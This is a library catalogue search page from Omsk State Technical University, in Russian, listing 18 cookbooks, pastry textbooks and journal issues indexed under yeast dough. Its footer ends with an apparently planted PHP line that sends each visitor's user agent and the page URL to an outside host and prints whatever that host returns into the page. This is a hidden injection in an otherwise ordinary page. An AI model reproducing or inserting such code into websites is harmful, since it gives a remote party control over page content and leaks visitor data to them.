Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

126 пользователей


Зарегистрированных: 4 

Борисенко Виктория Александровна

Лисина Марина Михайловна

Асташков Владимир Анатольевич

Медведева Юлия Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ТЕСТО ДРОЖЖЕВОЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 18
1. 
Сладкий сюрприз [Текст], 1998. - 333 с. [10] вкл. цв. л. с.
Держатели документа (Информация об экземплярах) 
2. 
Сопина Л. Н. Пособие для повара [Текст] / Л. Н. Сопина, 2000. - 240 с.
Ключевые слова 
ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ПИТАНИЕ ОБЩЕСТВЕННОЕ -- ОБРАБОТКА ПРОДУКТОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА КАРТОФЕЛЯ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА ГОРЯЧИЕ -- ЗАКУСКА -- БУТЕРБРОД -- ВИНЕГРЕТ -- СУП -- БУЛЬОН -- СУП ОВОЩНОЙ -- СУП КАРТОФЕЛЬНЫЙ -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ОВОЩЕЙ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- БРАКЕРАЖ
Держатели документа (Информация об экземплярах) 
3. 
Романова Т. В. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 200 с. [8] вкл. цв. л. с.
Ключевые слова 
КУЛИНАРИЯ ДОМАШНЯЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- СЕРВИРОВКА СТОЛА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- СУПЫ -- ЩИ -- БОРЩ -- РАССОЛЬНИК -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА МУЧНЫЕ -- БЛЮДА СЛАДКИЕ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- КРЕМ -- КАША ГУРЬЕВСКАЯ -- НАПИТКИ -- ТЕСТО ДРОЖЖЕВОЕ -- ПИРОГ -- ТЕСТО СЛОЕНОЕ -- МАННИК -- КЕКС -- ХВОРОСТ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- ФРУКТЫ -- ОВОЩИ -- КУХНЯ ОМСКАЯ -- ЗЕЛЬЦ -- СТУДЕНЬ -- СТЕРЛЯДЬ -- ЩУКА -- ВЕРЕЩАКА -- ПЕЛЬМЕНИ -- ПАСХА
Держатели документа (Информация об экземплярах) 
4. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
5. 
Организация процесса приготовления и приготовление сложных хлебобулочных, мучных кондитерских изделий [Текст] / сост. Н. А. Бенгардт, 2016. - 109 с.
Держатели документа (Информация об экземплярах) 
6. 
Пищевые ингредиенты: сырье и добавки. - Журнал, 2007г. № 1
Оглавление 
  • Алехина, Л. В. Новые вкусоароматические добавки компании "APOMAPOC-M" для снэковой и пищеконцентратной промышленности / Л. В. Алехина, Е. В. Мансветова, О. Н. Олейникова. - с.15
  • Ковалева, Л. Н. Новые национальные стандарты на пищевые добавки / Л. Н. Ковалева, Д. К. Кулев. - с.18
  • Тимощенко, Ю. А. Лецитины в производстве изделий из замороженного дрожжевого слоеного теста / Ю. А. Тимощенко, К. А. Пелевина, В. И. Игнатов. - с.22-24
    Кл. слова: ТЕСТО ДРОЖЖЕВОЕ
  • Бризанов Л. и,. Верный шаг на пути к комфорту - новые технические условия на колбасные изделия / Л. и, Бризанов, И. И. Овчинникова, А. Ф. Прожога. - с.26-27
    Кл. слова: ИЗДЕЛИЯ КОЛБАСНЫЕ
  • Инновационные ароматы Qpearl release совершают переворот в производстве жевательной резинки. - с.28
    Кл. слова: РЕЗИНКА ЖЕВАТЕЛЬНАЯ
  • Панов, Д. П. Обогащение продуктов питания массового потребления / Д. П. Панов. - с.30-31
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ
  • Бакулина, О. Н. Ингредиенты для индустрии здорового питания / О. Н. Бакулина, Т. Н. Некрасова. - с.32-34
    Кл. слова: ПИТАНИЕ ЗДОРОВОЕ
  • Комамонд, Ш. Живем, чтобы есть, или едим, чтобы жить? / Ш. Комамонд. - с.36-37
    Кл. слова: КАЧЕСТВО ПИЩИ, КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Алиева, Л. Р. Хитозан и молочные продукты / Л. Р. Алиева, С. С. Алиев. - с.38-39
    Кл. слова: ПРОДУКТЫ МОЛОЧНЫЕ - ПРОИЗВОД
  • Новинюк, Л. В. Цитраты аммония-железа - эффективные источники биодоступного железа / Л. В. Новинюк. - с.40
  • Михайлов, В. Е. Euro Vanilin Plus - новый продукт компании Borregaard Ingredients / В. Е. Михайлов. - с.46-47
  • Волков, М. Ю. Эффективные формы пробиотиков, иммобилизованных на природных адсорбентах / М. Ю. Волков. - с.48-51
  • Кисиль, Н. Н. Исследование биологически активных добавок к пище / Н. Н. Кисиль. - с.52-53
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Каргина, Е. Б. Системы обеспечения безопасности производства на основе принципов НАССР / Е. Б. Каргина, Е. А. Васюта. - с.54-55
    Кл. слова: НАССР
  • Красникова, Е. В. Современные методы контроля синтетических красителей в пищевых продуктах / Е. В. Красникова, Н. В. Рудометова. - с.56
    Кл. слова: КРАСИТЕЛЬ ПИЩЕВОЙ
  • Евелева, В. В. Получение и применение пищевых добавок на основе молочной кислоты и ее производных / В. В. Евелева. - с.58-60
    Кл. слова: ДОБАВКА ПИЩЕВАЯ - ПРОИЗВОДСТВО
  • Шарова, Н. Ю. Влияние состава питательной среды на биосинтез ингибиторов а-гликозидаз штаммами актиномицетов / Н. Ю. Шарова, Т. А. Никифорова, О. А. Ходкевич. - с.61-63
  • Новинюк, Л. В. Получение комплексных цитрат - и лактатсодержащих добавок для обогащения пищевых продуктов минеральными веществами / Л. В. Новинюк, И. Б. Новицкая, Д. Х. Кулев. - с.64
Держатели документа (Информация об экземплярах) 
7. 
Кондитерское и хлебопекарное производство. - Журнал, 2008г. № 9
Оглавление 
  • Агафонычев, В. П. Качество сухих яичных продуктов / В. П. Агафонычев, Т. И. Петрова, С. С. Кругалев. - с.3-6
    Кл. слова: ЯЙЦЕПРОДУКТЫ
  • Яичные продукты от "Роскара". Оптимальное решение. - с.7
  • Торт шоколадно-банановый с сухими яйцепродуктами. - с.8-9
    Кл. слова: ТОРТЫ
  • Бойцова, Е. Е. Новые виды сырья при производстве сбивных конфет / Е. Е. Бойцова. - с.10
    Кл. слова: КОНФЕТЫ
  • Гаврилова, О. М. Применение гречневой муки при производстве хлебобулочных изделий / О. М. Гаврилова. - с.12
    Кл. слова: МУКА гречневая, ХЛЕБ - ПРОИЗВОДСТВО
  • Скороженко, М. П. Влияние маргаринов на качество дрожжевых слоеных изделий / М. П. Скороженко. - с.14-16
    Кл. слова: ТЕСТО ДРОЖЖЕВОЕ, МАРГАРИН
  • Петрова, И. А. Новый эквивалент какао-масла / И. А. Петрова. - с.18
    Кл. слова: КАКАО - МАСЛО
  • Киреев, А. На пути к автоматизации производства тортов / А. Киреев. - с.20-22
  • Рудаков, О. Б. Стевия и стевиозид как натуральные подсластители / О. Б. Рудаков, Л. В. Рудакова. - с.23-26
    Кл. слова: СТЕВИЯ, СТЕВИОЗИД
  • Новые эмульгаторы для хлебопекарной промышленности. - с.27
    Кл. слова: ЭМУЛЬГАТОР
  • Оптимизация технологии производства быстрозамороженныхх изделий. - с.29-30
    Кл. слова: ИЗДЕЛИЯ БЫСТРОЗАМОРОЖЕННЫЕ
  • Хиллиам, М. Мировые тенденции развития ассортимента функциональных кондитерских изделий / М. Хиллиам. - с.31-33
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ
Держатели документа (Информация об экземплярах) 
8. 
Питание и общество. - Журнал, 2009г. № 8
Оглавление 
  • Пасько, О. В. Состояние и решение проблем школьного питания в омском регионе / О. В. Пасько, И. Крючкова, С. Галкина. - с.4-5
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Номофилова, Н. За здоровый образ жизни... Да кто же против? / Н. Номофилова. - с.12-13
    Кл. слова: ЗДОРОВЫЙ ОБРАЗ ЖИЗНИ, ВЫСТАВКА специализированная
  • Кучер, Л. Спас медовый, яблочный, хлебный... / Л. Кучер, Л. Шкуратова. - с.14-15
    Кл. слова: СПАС медовый, СПАС яблочный, СПАС хлебный
  • Забнев, С. Дегустация эспрессо / С. Забнев. - с.16
  • Разноообразие теста. - с.19
    Кл. слова: ТЕСТО ДРОЖЖЕВОЕ
  • Про пряности и приправы. - с.20
    Кл. слова: ПРЯНОСТИ, ПРИПРАВА
  • Гавшин, А. Куриная грудка, фаршированная курагой, с соусом "Дор Блю" / А. Гавшин. - с.20-21
    Кл. слова: БЛЮДА ИЗ ПТИЦЫ
  • Суворов, Р. Лосось с картофельным пюре, овощами и сливочным соусом с зеленью / Р. Суворов. - с.22
    Кл. слова: БЛЮДА ИЗ РЫБЫ
  • Филонов, М. "Растущая на камне" / М. Филонов. - с.22-23
    Кл. слова: ПЕТРУШКА
9. 
Усов В. В. Русская кухня: Блюда из овощей, грибов, молока и яиц, круп и муки. Выпечка [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / В. В. Усов, 2008. - 415 с.
Держатели документа (Информация об экземплярах) 
10. 
Барановский В. А. Кондитер [Текст] : учеб. пособие для уч-ся колледжей и сред. проф.-тех. училищ / В. А. Барановский, 2000. - 318 с.
Держатели документа (Информация об экземплярах) 
11. 
Рецептуры для кондитера [Текст] : [Сб.] / Авт.-сост. В. Прохоров, 2003. - 316 с.
Держатели документа (Информация об экземплярах) 
12. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 
13. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
14. 
Татарская Л. Л. Лабораторно-практические работы для поваров и кондитеров [Текст] : учеб. пособ. для нач. проф. образования / Л. Л. Татарская, Н. А. Анфимова, 2004. - 108 с.
Держатели документа (Информация об экземплярах) 
15. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
16. 
Гришина Е. С. Технология кондитерских изделий [Текст] : учеб.-метод. пособие для студентов специальности 260501 "Технология продуктов питания" и по направлению подготовки бакалавров 260100 "Технология продуктов питания" / Е. С. Гришина, 2010. - 247 с.
Держатели документа (Информация об экземплярах) 
17. 
Васюкова А. Т. Современные технологии хлебопечения [Текст] : учеб.-практ. пособие / А. Т. Васюкова, В. Ф. Пучкова, 2009. - 223 с.
Держатели документа (Информация об экземплярах) 
18. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3021 - 17.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.19 с.18 запросов, 0.77c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;